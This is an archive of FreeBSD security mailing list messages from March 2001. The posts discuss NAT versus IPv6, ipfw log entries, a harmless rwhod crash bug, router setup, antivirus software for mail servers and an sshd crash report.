When IPv4 was designed, everyone could have had their own number. It was
done a *long* time ago, and did not envision "The Internet Explosion".
Everyone else has just followed the specs so things interoperated. If
those "idiot engineers" hadn't done that, you wouldn't have equipment
coming out your "*rse-h*le" today. (^_^)
btw: If you stopped saying everyone else (including Vint Cerf, however
misgiuded or misquoted) is an idiot fewer folks might miss your otherwise
valid points. If I get it: "NAT works and IPv6 is still a *long* way off
for many very strong commercial realities." I gotta mostly agree with
that, but NAT has a price as well.
I hate fudging checksums because, while they only cause a little more
coding for script kiddies making fake- or poison-packet generators, they
also help ENet reliability. There are more things hurting packets than
just collisions.
If the world ever decides to jump to IPv6, all the server folks have to
renumber as well. How is this all supposed to happen without massive
outages and downtime? - Jy@
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 8:39:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241])
by hub.freebsd.org (Postfix) with ESMTP id A7D9837B718
for <security@freebsd.org>; Tue, 13 Mar 2001 08:39:35 -0800 (PST)
(envelope-from alan@agora.rdrop.com)
Received: (from alan@localhost)
by agora.rdrop.com (8.11.1/8.11.1) id f2DGeKb08565
for security@freebsd.org; Tue, 13 Mar 2001 08:40:20 -0800 (PST)
Date: Tue, 13 Mar 2001 08:40:20 -0800
From: Alan Batie <alan@batie.org>
To: security@freebsd.org
Subject: ipfw rule -1?
Message-ID: <20010313084020.A5859@agora.rdrop.com>
Mail-Followup-To: security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?
I couldn't find anything about it in the man page...
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
--
Alan Batie ______ www.rdrop.com/users/alan Me
alan@batie.org \ / www.qrd.org The Triangle
PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers
27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM!
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 8:44:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193])
by hub.freebsd.org (Postfix) with ESMTP id 8A35C37B718
for <security@freebsd.org>; Tue, 13 Mar 2001 08:44:27 -0800 (PST)
(envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost)
by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA73764;
Tue, 13 Mar 2001 11:44:24 -0500 (EST)
(envelope-from wollman)
Date: Tue, 13 Mar 2001 11:44:24 -0500 (EST)
From: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Message-Id: <200103131644.LAA73764@khavrinen.lcs.mit.edu>
To: security@freebsd.org
Subject: rwhod
In-Reply-To: <200103122347.f2CNlxT28110@freefall.freebsd.org>
References: <200103122347.f2CNlxT28110@freefall.freebsd.org>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
<<On Mon, 12 Mar 2001 15:47:59 -0800 (PST), FreeBSD Security Advisories <security-advisories@FreeBSD.ORG> said:
> Remote users can cause the rwhod daemon to crash, denying service to
> clients.
It's worth noting that most people who run `rwhod' use it only for
``tourist information'' anyway and do not actually depend on the
information it provides. I run it on my servers so that the nightly
reports will include the summary of uptimes and load averages, but if
one daemon goes AWOL I'll not be particularly concerned.
If, on the other hand, this bug is actually exploitable, that would be
much more serious (and would warrant a reissue of the advisory).
- -GAWollman
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rk5lI+eG6b7tlG4RAm4xAJ9sm/QFEbRIjppfMI776herCdCN4ACfZ0NK
7ec//L3imXWdyEoI4dcCgJ4=
=MStX
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 9: 1: 6 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
by hub.freebsd.org (Postfix) with ESMTP
id 8724137B719; Tue, 13 Mar 2001 09:00:56 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2DGwFN20651;
Tue, 13 Mar 2001 08:58:16 -0800 (PST)
(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "James Wyatt" <jwyatt@rwsystems.net>
Cc: "Bob Van Valzah" <Bob@Talarian.Com>,
"pW" <packetwhore@stargate.net>, <FreeBSD-Security@FreeBSD.ORG>,
<FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Tue, 13 Mar 2001 08:58:14 -0800
Message-ID: <000801c0abde$cb31c5a0$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
Importance: Normal
In-Reply-To: <Pine.BSF.4.10.10103130847370.72725-100000@bsdie.rwsystems.net>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of James Wyatt
>
>NAT is a tool and you can hurt yourself with it or do useful things with
>it, not an aberration or silver-bullet. Folks with fast hosts or small
>amounts of traffic and simple needs love it - especially home broadband
>users. There is a trade-off for many router users though: a) just change
>the header when NAT-ting, or b) correct the packet checksums and lose your
>ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer
>networking for groups of workstations across NAT barriers difficult if you
>have to chew-up static IPs from what I can tell.
>
>Many large corporations like GE Corp have huge RFC networks internally. If
>you ever have to make an internal Frame Relay link between them behind
>their public firewalls, you will learn new words for describing RFC
>networking limitations. "Oh &$*^^%! Our router thinks their Chicago server
>is on the same LAN segment as our Fort Worth server, but with a different
>netmask.
So what? Different netmasks create different subnets. It's perfectly
fine to have 2 different subnets on the same segment.
Now, if your using the word "segment" to mean something other than a
physical segment, but rather to mean "subnet" then your statement is
impossible. If both systems have different netmasks (and not the same IP
addresses, of course) then it's impossible for them to be on the same
subnet. Same physical segment, yes, but not the same subnet.
> Which of us should renumber our servers?
Neither. Sites that are geographically distant should be on separate
subnets.
>
>When IPv4 was designed, everyone could have had their own number. It was
>done a *long* time ago, and did not envision "The Internet Explosion".
>Everyone else has just followed the specs so things interoperated. If
>those "idiot engineers" hadn't done that, you wouldn't have equipment
>coming out your "*rse-h*le" today. (^_^)
>
The engineers that designed all that wern't idiots - as they emphasized
interoperability. If someone had come along back then and said "Let's
throw away the IPv4 scheme and replace it with IPv6 because we might run
out of numbers in the future" those engineers would have squashed that
on the interoperability altar.
>btw: If you stopped saying everyone else (including Vint Cerf, however
>misgiuded or misquoted) is an idiot fewer folks might miss your otherwise
>valid points.
I'm not. I'm saying that people that insist the problem is we haven't
all switched over to IPv6 are idiots. I'm also saying that engineers that
sit down TODAY at a blank drawing board, AFTER NAT IS A REALITY, and design
TCP/IP protocols that are incompatible with it are idiots.
The majority of Internet engineers are NOT in this group. There's a vocal
minority that is and are currently engaged in running around and telling
the majority that we are doing it wrong by using NAT.
If I get it: "NAT works and IPv6 is still a *long* way off
>for many very strong commercial realities." I gotta mostly agree with
>that, but NAT has a price as well.
>
Any connectivity solution has a price. NAT's price is cheaper than
the price of renumbering the entire Internet to IPv6 and it will
remain so until we truly are out of numbers, not just dealing with
an artifical shortage. Sorry, but engineers that ignore this fiscal
reality are idiot dreamers in my opinion.
>I hate fudging checksums because, while they only cause a little more
>coding for script kiddies making fake- or poison-packet generators, they
>also help ENet reliability. There are more things hurting packets than
>just collisions.
>
>If the world ever decides to jump to IPv6, all the server folks have to
>renumber as well. How is this all supposed to happen without massive
>outages and downtime? - Jy@
>
The IPv6 crowd is trying to frame the question as "It's not whether or not
we are going to switch, it's when" I'm interested to see your framing the
question as "It's not when we are going to switch to IPv6, it's IF"
I'm not even saying that. All I'm saying is that there is a tremendous
amount that can be done to extend the lifetime of the current
infrastructure, that includes NAT, extracting large public blocks from
corporations that don't use them publically, and many other things.
I'm saying that it's likely that in our lifetimes that the Internet will NOT
be switched over to IPv6. But, I'm not saying that it will NEVER be.
Ted Mittelstaedt tedm@toybox.placo.com
Author of: The FreeBSD Corporate Networker's Guide
Book website: http://www.freebsd-corp-net-guide.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 9:15:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11])
by hub.freebsd.org (Postfix) with SMTP id 815D837B719
for <security@freebsd.org>; Tue, 13 Mar 2001 09:15:17 -0800 (PST)
(envelope-from iedowse@maths.tcd.ie)
Received: from walton.maths.tcd.ie by salmon.maths.tcd.ie with SMTP
id <aa18169@salmon>; 13 Mar 2001 17:15:16 +0000 (GMT)
To: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Cc: security@freebsd.org, iedowse@maths.tcd.ie
Subject: Re: rwhod
In-Reply-To: Your message of "Tue, 13 Mar 2001 11:44:24 EST."
<200103131644.LAA73764@khavrinen.lcs.mit.edu>
Date: Tue, 13 Mar 2001 17:15:16 +0000
From: Ian Dowse <iedowse@maths.tcd.ie>
Message-ID: <200103131715.aa18169@salmon.maths.tcd.ie>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
In message <200103131644.LAA73764@khavrinen.lcs.mit.edu>, Garrett Wollman write
>
>If, on the other hand, this bug is actually exploitable, that would be
>much more serious (and would warrant a reissue of the advisory).
I am pretty certain that there is nothing exploitable about this
bug. The code ends up doing something like:
int *p = &local_variable;
for (;;) {
p[4] = ntohl(p[4]);
p[5] = ntohl(p[5]);
p += 6;
}
The variable `p' is a register variable in the dissassembly I looked
at. So this simply scans forward through the stack byte-swapping
ints, until it reaches inaccessible memory and dies.
Ian
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 9:31:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2])
by hub.freebsd.org (Postfix) with ESMTP id ECC9B37B718
for <security@freebsd.org>; Tue, 13 Mar 2001 09:31:11 -0800 (PST)
(envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3])
by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA10089
for <security@freebsd.org>; Tue, 13 Mar 2001 18:41:11 GMT
Message-Id: <200103131841.SAA10089@mailgate.kechara.net>
Date: Tue, 13 Mar 2001 17:35:00 -0000
To: security@freebsd.org
From: Lee Smallbone <lee@kechara.net>
Subject: [OT?] - Central point router
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Hi,
I'm trying to set up a router (running freebsd) that will allow me to have
all network traffic on one network segment run through this router. This
is for purposes of applying global firewall rules, and also for traffic monitoring.
My setup looks a little something like this:
62.xx.139.1
(internet) --- [telco supplied router]
|
|
|
[10/100 Switch] ----------- [firewall]-------(privately addressed LAN)
/ | \
[server 3] | \
62.xx.139.6 | \
| \
| [server 1]
[server 2] 62.xx.139.4
62.xx.139.5
What I'd like to be able to do is have a similar setup, but for it to look like this:
62.xx.139.1
(internet) --- [telco supplied router]
|
|
| 62.xx.139.3
[10/100 Switch] ----------- [firewall]-------(privately addressed LAN)
|
|
62.xx.139.7
========[router/firewall]==========
/ | \
[server 3] | \
62.xx.139.6 | \
| \
| [server 1]
[server 2] 62.xx.139.4
62.xx.139.5
How can I achieve this? Any traffic destined for say, 62.xx.139.5 would have to
pass via 62.xx.139.7 first.
Any help appreciated.
--
Lee Smallbone
Kechara Internet
lee@kechara.net
www.kechara.net
Tel: (01243) 869 969
Fax: (01243) 866 685
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 9:33:40 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2])
by hub.freebsd.org (Postfix) with ESMTP id C795237B718
for <security@freebsd.org>; Tue, 13 Mar 2001 09:33:32 -0800 (PST)
(envelope-from lee@kechara.net)
Received: from area57 (lan-fw.kechara.net [62.49.139.3])
by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA10102
for <security@freebsd.org>; Tue, 13 Mar 2001 18:43:33 GMT
Message-Id: <200103131843.SAA10102@mailgate.kechara.net>
Date: Tue, 13 Mar 2001 17:37:22 -0000
To: security@freebsd.org
From: Lee Smallbone <lee@kechara.net>
Subject: Re: [OT?] - Central point router
Reply-To: lee@kechara.net
Organization: Kechara Internet
X-Mailer: Opera 5.02 build 856a
X-Priority: 3 (Normal)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii";
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
That didn't come out too well...
If anyone can help, please let me know (from the text description) and I'll mail
you a txt attachment with a proper 'map'.
Thanks.
13/03/2001 17:35:00, Lee Smallbone <lee@kechara.net> wrote:
>Hi,
>
> I'm trying to set up a router (running freebsd) that will allow me to have
> all network traffic on one network segment run through this router. This
> is for purposes of applying global firewall rules, and also for traffic monitoring.
> My setup looks a little something like this:
>
> 62.xx.139.1
>(internet) --- [telco supplied router]
> |
> |
> |
> [10/100 Switch] ----------- [firewall]-------(privately addressed LAN)
> / | \
> [server 3] | \
> 62.xx.139.6 | \
> | \
> | [server 1]
> [server 2] 62.xx.139.4
> 62.xx.139.5
>
>
>What I'd like to be able to do is have a similar setup, but for it to look like this:
>
> 62.xx.139.1
>(internet) --- [telco supplied router]
> |
> |
> | 62.xx.139.3
> [10/100 Switch] ----------- [firewall]-------(privately addressed LAN)
> |
> |
> 62.xx.139.7
> ========[router/firewall]==========
> / | \
> [server 3] | \
> 62.xx.139.6 | \
> | \
> | [server 1]
> [server 2] 62.xx.139.4
> 62.xx.139.5
>
> How can I achieve this? Any traffic destined for say, 62.xx.139.5 would have to
> pass via 62.xx.139.7 first.
>
> Any help appreciated.
>
>--
>
>Lee Smallbone
>Kechara Internet
>
>lee@kechara.net
>www.kechara.net
>
>Tel: (01243) 869 969
>Fax: (01243) 866 685
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
>
--
Lee Smallbone
Kechara Internet
lee@kechara.net
www.kechara.net
Tel: (01243) 869 969
Fax: (01243) 866 685
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 9:49:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from paperbox.gvpl.victoria.bc.ca (paperbox.gvpl.victoria.bc.ca [199.60.107.1])
by hub.freebsd.org (Postfix) with ESMTP id 1E82A37B718
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 09:49:32 -0800 (PST)
(envelope-from scampbel@gvpl.ca)
Received: (from daemon@localhost)
by paperbox.gvpl.victoria.bc.ca (8.9.3/8.9.3) id JAA61989;
Tue, 13 Mar 2001 09:48:52 -0800 (PST)
(envelope-from scampbel@gvpl.ca)
Received: from pochta.gvpl.victoria.bc.ca(199.60.106.7) by paperbox.gvpl.victoria.bc.ca via smap (V2.1/2.1+anti-relay+anti-spam)
id xma061892; Tue, 13 Mar 01 09:48:31 -0800
Received: from localhost (scampbel@localhost)
by pochta.gvpl.victoria.bc.ca (8.11.1/8.11.1) with ESMTP id f2DHmXe26929;
Tue, 13 Mar 2001 09:48:33 -0800 (PST)
(envelope-from scampbel@pochta.gvpl.victoria.bc.ca)
Date: Tue, 13 Mar 2001 09:48:33 -0800 (PST)
From: Scott Campbell <scampbel@gvpl.ca>
To: James Wyatt <jwyatt@rwsystems.net>
Cc: Will Mitayai Keeso Rowe <mit@mitayai.net>,
<freebsd-security@FreeBSD.ORG>
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
Message-ID: <Pine.BSF.4.32.0103130922430.24156-100000@pochta.gvpl.victoria.bc.ca>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Mon, 12 Mar 2001, James Wyatt wrote:
> I have an eval copy of a product that looks promising: Sohpos antivirus.
>
> http://www.sophos.com/products/antivirus/savunix.html
>
> You can use the SAVI (API for virus checking) to scan email according to
> the description at:
>
> http://www.sophos.com/products/antivirus/savi/
>
> Their licensing looks fair and the sales person assigned to me has been
> politely helpful and not overly insistant. Everything I've looked at so
> far looks great, but the customer that wanted it has had delays and now
> wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
>
> Updates are monthly CDs and urgent updates are available as downloads.
>
> Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> scan the Samba partitions for file infections. It handles uSoft Office
> products like Word(tm) docs and such.
>
> Best of all, they support FreeBSD so we should support them, right? - Jy@
>
I can't say enough good things about the Sophos product. We originally
got it in April '99 and have been successfully stopping viruses ever
since. It is running on our mail server (currently FreeBSD v4.2R, was
3.0Snap until March 1) and is still available in aout and elf versions.
They have also added archive scanning inside numerous archive types. At
the time it was the only major company to have a FreeBSD version (NAI was
reported to have one but I couldn't track it down). I wrote my own
script, instead of using Amavis, to work with Sendmail to virus scan.
Another thing that I've set up is an automatic ide (virus identity)
download from Sophos. You can ask for automatic email notification when
they have written a new ide for a new virus (or variant). When that
email arrives the new ide file is fetched and put into the sweep (their
virus checking program) directory and used next time it is run (I batch
my email scanning). Service and support questions have always been
answered quickly and professionally.
We also use it on all our Win95/98/Me/NT machines - they update themselves
from a central server that is upgraded manually each month when the CD
arrives.
Scott E. Campbell
_______________________________
Computer Operations
Greater Victoria Public Library
Victoria BC CANADA
(250)382-7241 x230
scampbel@gvpl.ca
> On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:
> > Is anyone aware of any virus scanning solutions for freebsd, particularly
> > solutions for email? I don;t trust my users not to follow proper email
> > guidelines, and thus would like to stop email at the server before they get
> > delivered the message.
> >
> > Regards,
> > Mit
> >
> > --
> > Will Mitayai Keeso Rowe
> >
> > For full contact information, please visit:
> > http://my.infotriever.com/mitayai
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 10: 1: 8 2001
Delivered-To: freebsd-security@freebsd.org
Received: from vbook.express.ru (vbook.express.ru [212.24.37.106])
by hub.freebsd.org (Postfix) with ESMTP id 1C3FF37B718
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 10:01:01 -0800 (PST)
(envelope-from vova@vbook.express.ru)
Received: (from vova@localhost)
by vbook.express.ru (8.9.3/8.9.3) id VAA27600;
Tue, 13 Mar 2001 21:00:51 +0300 (MSK)
(envelope-from vova)
From: "Vladimir B. Grebenschikov" <vova@express.ru>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15022.24659.260945.39477@vbook.express.ru>
Date: Tue, 13 Mar 2001 21:00:51 +0300 (MSK)
To: Scott Campbell <scampbel@gvpl.ca>
Cc: James Wyatt <jwyatt@rwsystems.net>,
Will Mitayai Keeso Rowe <mit@mitayai.net>,
<freebsd-security@FreeBSD.ORG>
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <Pine.BSF.4.32.0103130922430.24156-100000@pochta.gvpl.victoria.bc.ca>
References: <Pine.BSF.4.10.10103122000480.72725-100000@bsdie.rwsystems.net>
<Pine.BSF.4.32.0103130922430.24156-100000@pochta.gvpl.victoria.bc.ca>
X-Mailer: VM 6.72 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Scott Campbell writes:
> On Mon, 12 Mar 2001, James Wyatt wrote:
>
> > I have an eval copy of a product that looks promising: Sohpos antivirus.
> >
> > http://www.sophos.com/products/antivirus/savunix.html
> >
> > You can use the SAVI (API for virus checking) to scan email according to
> > the description at:
> >
> > http://www.sophos.com/products/antivirus/savi/
> >
> > Their licensing looks fair and the sales person assigned to me has been
> > politely helpful and not overly insistant. Everything I've looked at so
> > far looks great, but the customer that wanted it has had delays and now
> > wants to wait for FreeBSD 4.3-RELEASE to install things on their server.
> >
> > Updates are monthly CDs and urgent updates are available as downloads.
> >
> > Our intent is to have it go after SMTP, HTTP, and FTP if we can and to
> > scan the Samba partitions for file infections. It handles uSoft Office
> > products like Word(tm) docs and such.
> >
> > Best of all, they support FreeBSD so we should support them, right? - Jy@
> >
>
> I can't say enough good things about the Sophos product. We originally
> got it in April '99 and have been successfully stopping viruses ever
> since. It is running on our mail server (currently FreeBSD v4.2R, was
> 3.0Snap until March 1) and is still available in aout and elf versions.
> They have also added archive scanning inside numerous archive types. At
> the time it was the only major company to have a FreeBSD version (NAI was
> reported to have one but I couldn't track it down). I wrote my own
> script, instead of using Amavis, to work with Sendmail to virus scan.
> Another thing that I've set up is an automatic ide (virus identity)
> download from Sophos. You can ask for automatic email notification when
> they have written a new ide for a new virus (or variant). When that
> email arrives the new ide file is fetched and put into the sweep (their
> virus checking program) directory and used next time it is run (I batch
> my email scanning). Service and support questions have always been
> answered quickly and professionally.
>
> We also use it on all our Win95/98/Me/NT machines - they update themselves
> from a central server that is upgraded manually each month when the CD
> arrives.
There are avp software
ftp://downloads1.kaspersky-labs.com/products/avp_unix/freebsd/
Info about product you can get from: http://www.avp.ru/
Product have possibility to run in daemon mode (checks files sent via
unix domain socket)
> Scott E. Campbell
--
TSB Russian Express, Moscow
Vladimir B. Grebenschikov, vova@express.ru
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 10:37:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4])
by hub.freebsd.org (Postfix) with ESMTP id A48B737B718
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 10:37:33 -0800 (PST)
(envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost)
by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2DIbe513255
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 13:37:40 -0500 (EST)
(envelope-from rsimmons@wlcg.com)
Date: Tue, 13 Mar 2001 13:37:35 -0500 (EST)
From: Rob Simmons <rsimmons@wlcg.com>
To: <freebsd-security@freebsd.org>
Subject: sshd core
Message-ID: <Pine.BSF.4.33.0103131334500.8515-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I was wondering if someone had a patch for the sshd problem when someone
tries to login with a non-existant account? If so, has it been commited
yet?
Robert Simmons
Systems Administrator
http://www.wlcg.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org
iD8DBQE6rmj0v8Bofna59hYRAvpdAJ9Vn3d9yiFApvgzZ7NgyoVVASlM/wCfdEpL
xHTk/6MO5zDCzUtFV9tKqBM=
=iZI+
-----END PGP SIGNATURE-----
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 10:47:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4])
by hub.freebsd.org (Postfix) with ESMTP id 828F737B718
for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 10:47:20 -0800 (PST)
(envelope-from mike@sentex.net)
Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47])
by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f2DIl5656018;
Tue, 13 Mar 2001 13:47:05 -0500 (EST)
(envelope-from mike@sentex.net)
Message-Id: <5.0.2.1.0.20010313134057.040dfa70@marble.sentex.ca>
X-Sender: mdtpop@marble.sentex.ca
X-Mailer: QUALCOMM Windows Eudora Version 5.0.2
Date: Tue, 13 Mar 2001 13:41:06 -0500
To: Rob Simmons <rsimmons@wlcg.com>, <freebsd-security@FreeBSD.ORG>
From: Mike Tancsa <mike@sentex.net>
Subject: Re: sshd core
In-Reply-To: <Pine.BSF.4.33.0103131334500.8515-100000@mail.wlcg.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
See the open PR.
---Mike
At 01:37 PM 3/13/01 -0500, Rob Simmons wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>I was wondering if someone had a patch for the sshd problem when someone
>tries to login with a non-existant account? If so, has it been commited
>yet?
>
>Robert Simmons
>Systems Administrator
>http://www.wlcg.com/
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.0.4 (FreeBSD)
>Comment: For info see http://www.gnupg.org
>
>iD8DBQE6rmj0v8Bofna59hYRAvpdAJ9Vn3d9yiFApvgzZ7NgyoVVASlM/wCfdEpL
>xHTk/6MO5zDCzUtFV9tKqBM=
>=iZI+
>-----END PGP SIGNATURE-----
>
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 13:52:10 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-59.dsl.lsan03.pacbell.net [63.207.60.59])
by hub.freebsd.org (Postfix) with ESMTP id 623DC37B718
for <security@FreeBSD.ORG>; Tue, 13 Mar 2001 13:52:06 -0800 (PST)
(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
id 185BA66B6C; Tue, 13 Mar 2001 13:52:06 -0800 (PST)
Date: Tue, 13 Mar 2001 13:52:06 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Garrett Wollman <wollman@khavrinen.lcs.mit.edu>
Cc: security@FreeBSD.ORG
Subject: Re: rwhod
Message-ID: <20010313135205.A17955@mollari.cthul.hu>
References: <200103122347.f2CNlxT28110@freefall.freebsd.org> <200103131644.LAA73764@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
protocol="application/pgp-signature"; boundary="3MwIy2ne0vdjdPXF"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200103131644.LAA73764@khavrinen.lcs.mit.edu>; from wollman@khavrinen.lcs.mit.edu on Tue, Mar 13, 2001 at 11:44:24AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
--3MwIy2ne0vdjdPXF
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
On Tue, Mar 13, 2001 at 11:44:24AM -0500, Garrett Wollman wrote:
> <<On Mon, 12 Mar 2001 15:47:59 -0800 (PST), FreeBSD Security Advisories <=
security-advisories@FreeBSD.ORG> said:
>=20
> > Remote users can cause the rwhod daemon to crash, denying service to
> > clients.
>=20
> It's worth noting that most people who run `rwhod' use it only for
> ``tourist information'' anyway and do not actually depend on the
> information it provides. I run it on my servers so that the nightly
> reports will include the summary of uptimes and load averages, but if
> one daemon goes AWOL I'll not be particularly concerned.
>=20
> If, on the other hand, this bug is actually exploitable, that would be
> much more serious (and would warrant a reissue of the advisory).
Yeah, it's pretty tame..but still worth reporting (instances where
daemons can be remotely induced to crash are a class of bug we report
in advisories, reliability is a component of security, etc :-)
Kris
